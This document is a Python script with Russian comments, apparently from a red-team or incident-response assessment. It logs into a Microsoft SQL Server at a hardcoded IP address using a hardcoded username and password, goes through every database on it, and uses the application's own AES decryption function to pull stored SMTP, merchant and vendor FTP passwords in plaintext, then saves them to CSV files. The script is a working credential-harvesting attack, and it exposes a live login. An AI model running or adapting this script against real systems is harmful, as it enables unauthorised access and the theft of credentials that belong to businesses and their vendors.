#!/usr/bin/env python3
"""
Пошаговая расшифровка зашифрованных полей - ИСПРАВЛЕННАЯ ВЕРСИЯ
Убраны несуществующие контекстные поля
"""
import subprocess
import csv
import time
from pathlib import Path

SERVER = "50.21.183.111"
USER = "irely"
PASS = "iRely486"
OUTPUT_DIR = Path('/root/ir-assessment/redteam/irelydata/decrypted_remaining_fields')
OUTPUT_DIR.mkdir(exist_ok=True)

def sqlcmd(db, query, timeout=30):
    """Запуск sqlcmd через docker"""
    cmd = [
        "docker", "run", "--rm", "--network", "host",
        "mcr.microsoft.com/mssql/server:2022-latest",
        "/opt/mssql-tools18/bin/sqlcmd",
        "-S", SERVER, "-U", USER, "-P", PASS, "-C",
        "-d", db,
        "-Q", query,
        "-s", "|", "-W"
    ]
    try:
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
        return result.stdout, result.stderr
    except subprocess.TimeoutExpired:
        return "", "TIMEOUT"

def get_databases():
    """Получить список баз данных"""
    cmd = [
        "docker", "run", "--rm", "--network", "host",
        "mcr.microsoft.com/mssql/server:2022-latest",
        "/opt/mssql-tools18/bin/sqlcmd",
        "-S", SERVER, "-U", USER, "-P", PASS, "-C",
        "-Q", "SET NOCOUNT ON; SELECT name FROM sys.databases WHERE name NOT IN ('master','model','msdb','tempdb') ORDER BY name",
        "-s", "|", "-W", "-h", "-1"
    ]
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
    lines = [l.strip() for l in result.stdout.strip().splitlines() if l.strip()]
    skip = ('To learn', 'SQL Server', 'This container', 'user', 'visit', 'running', 'as', 'more', 'is', 'mssql', 'container')
    dbs = [l for l in lines if not any(l.startswith(p) for p in skip) and l not in ('i21Hangfire',) and '\\' not in l]
    return dbs

def table_exists(db, table):
    """Проверить существование таблицы"""
    stdout, _ = sqlcmd(db, f"SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='{table}'", timeout=15)
    for line in stdout.strip().splitlines():
        if line.strip().isdigit():
            return int(line.strip()) > 0
    return False

def column_exists(db, table, column):
    """Проверить существование колонки"""
    stdout, _ = sqlcmd(db, f"SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='{table}' AND COLUMN_NAME='{column}'", timeout=15)
    for line in stdout.strip().splitlines():
        if line.strip().isdigit():
            return int(line.strip()) > 0
    return False

def count_encrypted(db, table, field):
    """Подсчитать зашифрованные записи"""
    stdout, _ = sqlcmd(db, f"SELECT COUNT(*) FROM {table} WHERE {field} IS NOT NULL AND LEN({field}) > 40", timeout=15)
    for line in stdout.strip().splitlines():
        if line.strip().isdigit():
            return int(line.strip())
    return 0

def decrypt_table(db, table, pk_field, encrypted_fields):
    """Расшифровать таблицу - ИСПРАВЛЕНО: без контекстных полей"""
    select_parts = [pk_field]
    decrypt_selects = [f"dbo.fnAESDecryptASym({field}) AS {alias}" for field, alias in encrypted_fields]
    query = f"SET NOCOUNT ON; SELECT {', '.join(select_parts + decrypt_selects)} FROM {table}"
    where = [f"({field} IS NOT NULL AND {field} != '' AND LEN({field}) > 40)" for field, _ in encrypted_fields if column_exists(db, table, field)]
    if not where:
        return "", "NO_ENCRYPTED_FIELDS"
    query += f" WHERE {' OR '.join(where)}"
    stdout, stderr = sqlcmd(db, query, timeout=300)
    if 'Invalid object' in stderr or 'Invalid column' in stderr:
        return None, stderr
    return stdout, stderr

def parse_csv_output(text):
    """Парсинг sqlcmd вывода"""
    lines = text.strip().splitlines()
    header_idx = None
    for i, line in enumerate(lines):
        if '|' in line and not line.startswith('---') and 'SQL Server' not in line and 'container' not in line and 'go.microsoft' not in line:
            header_idx = i
            break
    if header_idx is None:
        return []
    headers = [h.strip() for h in lines[header_idx].split('|')]
    rows = []
    for line in lines[header_idx + 1:]:
        if not line.strip() or line.startswith('---') or '|' not in line:
            continue
        parts = [p.strip() for p in line.split('|')]
        if len(parts) >= 2:
            while len(parts) < len(headers):
                parts.append('')
            rows.append(dict(zip(headers, parts)))
    return rows

def main():
    print("=== Пошаговая расшифровка - ИСПРАВЛЕННАЯ ===")
    
    # Получаем базы данных
    dbs = get_databases()
    print(f"Баз данных: {len(dbs)}")
    
    # Таблицы для расшифровки - БЕЗ контекстных полей
    tables = [
        ('tblSMCompanyPreference', 'intCompanyPreferenceId', [
            ('strSMTPPassword', 'decrypted_smtp_password'),
            ('strMerchantPassword', 'decrypted_merchant_password'),
        ]),
        ('tblEMEntitySMTPInformation', 'intEntitySMTPInfoId', [
            ('strPassword', 'decrypted_smtp_password'),
        ]),
        ('tblAPVendor', 'intEntityId', [
            ('strStoreFTPPassword', 'decrypted_ftp_password'),
        ]),
    ]
    
    total_records = 0
    total_tables = 0
    
    for db_idx, db in enumerate(dbs, 1):
        print(f"\n[{db_idx}/{len(dbs)}] {db}")
        
        for table, pk_field, encrypted_fields in tables:
            # Проверяем существование таблицы
            if not table_exists(db, table):
                print(f"  {table}: таблица не существует")
                continue
            
            # Фильтруем существующие поля
            existing = [(f, a) for f, a in encrypted_fields if column_exists(db, table, f)]
            if not existing:
                print(f"  {table}: нет зашифрованных полей")
                continue
            
            # Подсчитываем зашифрованные записи
            count = count_encrypted(db, table, existing[0][0])
            if count == 0:
                print(f"  {table}: 0 зашифрованных записей")
                continue
            
            print(f"  {table}: {count} записей, {len(existing)} полей")
            
            # Расшифровываем
            stdout, stderr = decrypt_table(db, table, pk_field, existing)
            if stdout is None:
                print(f"    ERROR: {stderr[:200]}")
                continue
            
            rows = parse_csv_output(stdout)
            if not rows:
                print(f"    0 записей расшифровано")
                continue
            
            # Сохраняем CSV
            safe_db = db.replace('\\', '_')
            csv_file = OUTPUT_DIR / f"{safe_db}_{table}_decrypted.csv"
            with open(csv_file, 'w', newline='', encoding='utf-8') as f:
                writer = csv.DictWriter(f, fieldnames=list(rows[0].keys()))
                writer.writeheader()
                writer.writerows(rows)
            
            print(f"    ✓ {len(rows)} записей -> {csv_file.name}")
            total_records += len(rows)
            total_tables += 1
    
    print(f"\n{'='*60}")
    print(f"ИТОГО: {total_records} записей из {total_tables} таблиц")
    print(f"Результаты: {OUTPUT_DIR}")

if __name__ == '__main__':
    main()
